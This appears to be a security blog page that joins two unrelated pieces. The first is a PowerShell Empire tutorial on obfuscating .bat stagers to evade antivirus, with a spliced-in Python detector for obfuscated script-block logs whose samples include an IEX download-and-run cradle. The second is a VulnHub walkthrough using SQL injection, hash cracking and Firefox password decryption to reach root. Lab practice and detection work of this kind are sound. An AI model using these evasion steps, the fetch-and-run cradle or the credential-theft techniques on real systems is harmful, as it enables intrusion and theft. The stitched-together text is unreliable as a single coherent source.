Defense Evasion with obfuscated Empire

In this article, we will learn the technique of Defense Evasion using PowerShell Empire. PowerShell Empire is one of my favorite post-exploitation tools, and a very capable one at that.

Table of Contents:

· Installation

· Getting a session with Empire

· Obfuscating with Empire

Installation

When you intend to evade the target's defenses with Empire, the installation method matters. There are two ways to install Empire, and the obfuscation scripts will not work if you install it with the apt install command. That problem does not occur if you clone the repository with git, as shown below.

git clone https://github.com/BC-SECURITY/Empire

The above command downloads Empire to your system. To install it, run the following commands:

cd Empire/

cd setup/

./install.sh



Getting a session with Empire

With the above commands, Empire is downloaded and installed. Let us now get Empire up and running and obtain a session on the target system. Once you start Empire, the first thing to do is to start a listener. To start a listener, use the following set of commands:

listeners

uselistener http

set Port 80

execute

The above commands start an HTTP listener on port 80. Once the listener is active, we have to generate a stager. The stager we are going to use in this article is a Windows batch (.bat) launcher. To generate it, use the following set of commands:

back

usestager windows/launcher_bat

set Listener http

execute



Once your malicious file is ready, it is stored in the /tmp directory by default, as you can see in the image above. To deliver this .bat file to the target system you can use the Python one-liner web server or any other method you like; we used the Python server for this practical. Run the following command from the directory where the file is saved, /tmp in our case (this is the Python 2 module; Python 3 ships the equivalent http.server module):

python -m SimpleHTTPServer



Once the file is executed on the target system, you get your session, as shown in the image below. To access the session, or agent in Empire terminology, use the following commands:

agents

interact <agent name>



In Event Viewer, go to Applications and Services Logs > Microsoft > Windows > PowerShell > Operational and check the script block log (event ID 4104) generated by the batch file from Empire, as shown in the image below:



Obfuscating with Empire

As you can see in the image above, the log gives full details of the malicious file: the PowerShell code it ran, where the file is stored, and other important information. When those details are readable, the file is easy to detect. To attack the target successfully, we need to evade the defenses it has in place, so we will enable obfuscation globally in Empire and only then generate our malicious file. Obfuscating Empire means every stager and agent it generates from then on is obscured, i.e. harder to recognise on the target system, which lets you slip past signature-based defenses such as antivirus. To obfuscate Empire, first run the following command:

preobfuscate

The above command runs Empire's PowerShell module sources through Invoke-Obfuscation ahead of time, so that obfuscated versions are ready when they are needed.



The command takes a while, but if it makes the attack succeed the time is well spent. Once all the module sources have been obfuscated, run the following command:

set Obfuscate true

This enables obfuscation for the session: every stager you build and every agent you receive from now on will be obfuscated, as you can see in the image below:



Now that obfuscation is active, start the listener again as shown earlier in this article. Once the listener is up and running, launch a stager with the following set of commands:

usestager windows/launcher_bat

set Listener http

execute



As before, deliver the malicious file to the target system with the Python web server.

Once the file is executed on the target system, you get a new session, as shown in the image below. To access the new agent, use the following commands:

agents

interact <agent name>



This session came through the obfuscated stager, and we will confirm that with Event Viewer. Follow the same path as earlier (Applications and Services Logs > Microsoft > Windows > PowerShell > Operational) to see the log created by our malicious file. As you can see in the image below, the details in the log are now vague and confusing. Signature-based defenses such as antivirus that look for the readable launcher will not recognise it. Keep in mind that the script block is still logged: script block logging records each block as it is compiled, so the layers that obfuscated code unwraps at run time (for example through Invoke-Expression) land in the same log in decoded form, and defenders who hunt for obfuscation patterns in 4104 events can still spot it.
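To show what a defender sees on the other side of this, here is an added example that is not part of the original article or of Empire: a Python script that pulls the ScriptBlockText field out of a 4104 event like the one shown in Event Viewer above and scores it for the constructs Invoke-Obfuscation-style launchers rely on (format-operator string building, [char] casts, chopped-up string concatenation, indirect invocation, backtick escapes). The two sample script blocks, the event XML, the indicator weights and the threshold are constructed for this demo; the Data field names follow the 4104 event layout.

```python
"""Flag obfuscated PowerShell in script block logs (event ID 4104).

Added example, not part of the original article or of Empire. Reads the
ScriptBlockText field from a 4104 event in the XML layout Event Viewer
exports and scores it for Invoke-Obfuscation style constructs. The sample
blocks, the event XML, the indicator weights and the threshold are all
constructed for this demo (assumptions), not a vendor ruleset.
"""
import math
import re
import xml.etree.ElementTree as ET
from collections import Counter
from xml.sax.saxutils import escape

# Constructed sample: a plain download-cradle launcher ...
PLAIN_BLOCK = (
    "$wc = New-Object System.Net.WebClient; "
    "$wc.Headers.Add('User-Agent', 'Mozilla/5.0'); "
    "IEX $wc.DownloadString('http://192.168.1.100/launcher.ps1')"
)

# ... and an Invoke-Obfuscation style rewrite of the same logic (constructed).
OBFUSCATED_BLOCK = (
    r"""&("{1}{0}" -f 'EX','I') (("{2}{0}{1}" -f 'eW-ObJ','eCt','N') """
    r"""+ (' Sy' + 'sTe' + 'm.NeT.' + 'We' + 'bCl' + 'IeNt'))"""
    r""".("{0}{2}{1}" -f 'Dow','g','nLoAdStRiN')"""
    r"""([char]104+[char]116+[char]116+[char]112+'://192.168.1.100/l' """
    r"""+ 'aUn' + 'cHe' + "r`.p`s1")"""
)

EVENT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"

# Indicator name -> (regex over the script block text, weight). Weights are assumptions.
INDICATORS = {
    # ("{1}{0}" -f 'EX','I'): strings assembled with the format operator
    "format_operator": (re.compile(r'"\{\d+\}[^"]*"\s*-f\s', re.I), 3),
    # [char]104 style casts that spell a string one byte at a time
    "char_casts": (re.compile(r"\[char\]\s*\d+", re.I), 1),
    # short quoted fragments glued together: 'aUn' + 'cHe'
    "string_concat": (re.compile(r"'[^']{1,6}'\s*\+\s*'"), 2),
    # &("...") or .("..."): invoking a command whose name is computed
    "indirect_invoke": (re.compile(r"[&.]\s*\("), 3),
    # backtick escapes dropped into identifiers: r`.p`s1
    "backticks": (re.compile(r"`"), 1),
}
SCORE_THRESHOLD = 6


def make_4104_event(script_text):
    """Build a minimal 4104 event in the XML layout Event Viewer exports (constructed)."""
    return (
        f'<Event xmlns="{EVENT_NS}"><System>'
        '<Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>'
        '</System><EventData><Data Name="MessageNumber">1</Data>'
        '<Data Name="MessageTotal">1</Data>'
        f'<Data Name="ScriptBlockText">{escape(script_text)}</Data>'
        '<Data Name="ScriptBlockId">00000000-0000-0000-0000-000000000000</Data>'
        '<Data Name="Path"></Data></EventData></Event>'
    )


def script_block_text(event_xml):
    """Return the ScriptBlockText of a 4104 event, honouring the event namespace."""
    root = ET.fromstring(event_xml)
    event_id = root.findtext(f"{{{EVENT_NS}}}System/{{{EVENT_NS}}}EventID")
    if event_id != "4104":
        raise ValueError(f"expected event 4104, got {event_id}")
    for data in root.iter(f"{{{EVENT_NS}}}Data"):
        if data.get("Name") == "ScriptBlockText":
            return data.text or ""
    raise ValueError("event has no ScriptBlockText field")


def shannon_entropy(text):
    """Bits per character; obfuscated blocks tend to run higher than hand-written ones."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def obfuscation_features(text):
    """Count each indicator in the block, plus its entropy (reported, not scored)."""
    features = {name: len(rx.findall(text)) for name, (rx, _) in INDICATORS.items()}
    features["entropy"] = round(shannon_entropy(text), 2)
    return features


def obfuscation_score(text):
    """Weighted sum of indicator hits."""
    return sum(len(rx.findall(text)) * weight for rx, weight in INDICATORS.values())


def is_obfuscated(text):
    return obfuscation_score(text) >= SCORE_THRESHOLD


def triage_event(event_xml):
    """Full pipeline: event XML in, verdict plus the evidence out."""
    text = script_block_text(event_xml)
    return {
        "score": obfuscation_score(text),
        "features": obfuscation_features(text),
        "verdict": "obfuscated" if is_obfuscated(text) else "plain",
    }


if __name__ == "__main__":
    for block in (PLAIN_BLOCK, OBFUSCATED_BLOCK):
        print(triage_event(make_4104_event(block)))
```

On a real host the same triage would be fed from an XML export of the PowerShell/Operational log filtered to event 4104; the point is that the "vague and confusing" text in the log is itself a signal, and a handful of cheap regexes separate it from the plain launcher without knowing anything about Empire.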


This way, obfuscated Empire can keep you from getting caught on the target system. It is important to learn such techniques in order to slip past the target's defenses and test whether the defenses in place are adequate.

Insanity: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "Insanity: 1". It is available at VulnHub for penetration testing practice and you can download it from here.

Credit for building this lab goes to Thomas Williams. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

§  Wireshark

Exploiting

§  SQL Injection through e-mails

§  Password theft from the database

§  Weak hash cracking

Privilege Escalation

§  Decrypting passwords stored in Firefox

§  Capture the flag

Walkthrough

Reconnaissance

We locate the machine on the network with netdiscover:

$ netdiscover -i ethX



So, we add the IP address to our "/etc/hosts" file and start by scanning all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A -p- insanity.vh



Enumeration

Reconnaissance and enumeration of the vulnerable services has been the hardest part of this machine, since it runs many services designed to entangle you, and all of them except one turn out to be rabbit holes.

Some evidence of these services (rabbit hole):

FTP:



Bludit (from here we enumerate the user "otis"):



phpMyAdmin:



Having seen the above, let's go straight to the service that is actually vulnerable.

We start with the organization's web service, a hosting service.



We fuzzed with dirsearch and found several directories, but we will focus on only two: "/monitoring/" and "/webmail/".



We log in with the user "otis" and the password "123456" (obtained by guessing).



We enter a panel that monitors the internal servers, and we see that we can add new servers.



We insert our IP (any other live host would do) and see that it reports "Status: UP". What does this tell us? That the application underneath is pinging our machine to check whether it is up.



We use dirsearch again, this time fuzzing the contents of "/monitoring/".

We go through the directories obtained until we reach the directory "/monitoring/class/".



We access the directory and find what we already suspected: a "ping.php" file.



We open Wireshark and see that the machine does indeed execute a ping. Are you thinking the same as me? Of course: a command injection!


As usual, let's do a proof of concept.



We wait for it to run, but see that it does not work (Status: DOWN). We cross-check with Wireshark and see no traffic either, so this is another "rabbit hole".


Well, nothing there; we move on to the other service. Now we have SquirrelMail version 1.4.22. If you search for an exploit you will find that it is vulnerable to remote code execution (RCE), but I can tell you in advance that this will not work either xD.



We use the same credentials, open the "Inbox" and see that e-mails with errors are arriving. Attention! These e-mails only appear when a server is "DOWN".



We read one of them and notice it is structured in 4 columns... This caught my attention, since the information looks like it is being loaded from a database.



Seeing this, I lost my mind and came up with the crazy idea of launching a list of SQL Injection payloads at it (/usr/share/wfuzz/wordlist/vulns/sql_inj.txt).

Attack configuration:



Attack executed:



We check all the e-mails we receive and find this one, which shows "Localhost"; therefore, the site is vulnerable to SQL Injection.



We do another test, this time extracting the hostname and the MariaDB version.



Exploiting

We continue exploiting the vulnerability. Although this could be covered faster with just 3 screenshots, I think it is worth seeing all of these images, which will help us learn how to exploit SQL injection without any tools.

Obtain user and database:



Obtain all databases:



Obtain all tables:


Obtain all the columns in a table:



Dump users, passwords and emails:



After trying to crack the hashes of the two (hidden) users, it is not possible to recover them, even with JtR, Hashcat or online tools. Everything points to another "rabbit hole".

We continue enumerating and find these two hashes in the "mysql" database.



The 2nd hash does not look like a MySQL hash; we use the online tool "hashes.com" and obtain the password in plain text.



We log in through SSH and great! We are in!



Privilege Escalation (root)

We run "ls -lna" and see that we have a "Mozilla Firefox" folder, which is very unusual.

Whenever you see software folders like this, check them out, because it is not normal.



We check whether the browser has been storing user passwords. How? As simply as listing these 4 files.



If these files exist, the profile holds saved passwords (Firefox stores saved logins in logins.json, encrypted with a key kept in key4.db), and we can use the tool "Firefox_Decrypt" to recover them in plain text.

We download the tool, choose the 2nd option and enter nothing when it asks for the "Master Password".

We get the "root" user's credentials in plain text.



We try to authenticate as "root" with the password obtained and... Yes! We are root!

We read the flag and have a good coffee.



Author: David Utón is a Penetration Tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contact him on LinkedIn and Twitter.